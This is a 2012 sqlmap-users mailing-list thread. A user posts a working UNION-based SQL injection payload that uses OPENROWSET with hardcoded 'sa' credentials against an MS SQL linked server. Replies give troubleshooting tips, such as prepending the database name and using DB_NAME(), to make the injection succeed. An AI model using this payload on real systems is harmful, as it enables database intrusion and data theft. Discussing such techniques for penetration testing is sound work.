Re: [sqlmap-users] error with ms sql

Thu, 21 Jun 2012 01:14:48 -0700 

p.s. find the current database name and prepend to the resultbcd (e.g.
........'SELECT output FROM currentdb.resultbcd'........)
p.p.s. SELECT DB_NAME() <- should work for retrieving current db name via
that OPENROWSET

On Thu, Jun 21, 2012 at 10:11 AM, Miroslav Stampar <
miroslav.stam...@gmail.com> wrote:

> Hi Adi.
>
> You could try prepending the database name to the resultbcd. It seems that
> in case of linked server(s) doing that fixes the mentioned problem
> (Reference:
> http://cadarsh.blogspot.com/2011/02/deferred-prepare-could-not-be-completed.html?showComment=1336571978284#c7393130515903351466
> )
>
> Kind regards,
> Miroslav Stampar
>
> On Thu, Jun 21, 2012 at 10:01 AM, Adi Mutu <adi_mut...@yahoo.com> wrote:
>
>> I'm having an injection like this:
>> openrowset in a union (I've managed to do a SELECT @@version on
>> 192.168.1.4)
>>
>> -1 union all select '1','2','3','4','5','6','7','8','9','10','11','12',
>>  ( select * from
>> OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5','select
>> output from resultbcd')),'aaa','15','16','17','18','19','20','21' from
>> teachers7 where id=808
>>
>> and when I try to select form resultabcd i get:
>> [OLE/DB provider returned message: Deferred prepare could not be
>> completed.]
>>
>> could not find a good answer with google. Thanks.
>>
>> Kind regards,
>> A.
>>
>>
>> ------------------------------------------------------------------------------
>> Live Security Virtual Conference
>> Exclusive live event will cover all the ways today's security and
>> threat landscape has changed and how IT managers can respond. Discussions
>> will include endpoint security, mobile security and the latest in malware
>> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>> _______________________________________________
>> sqlmap-users mailing list
>> sqlmap-users@lists.sourceforge.net
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>



-- 
Miroslav Stampar
http://about.me/stamparm

------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and 
threat landscape has changed and how IT managers can respond. Discussions 
will include endpoint security, mobile security and the latest in malware 
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to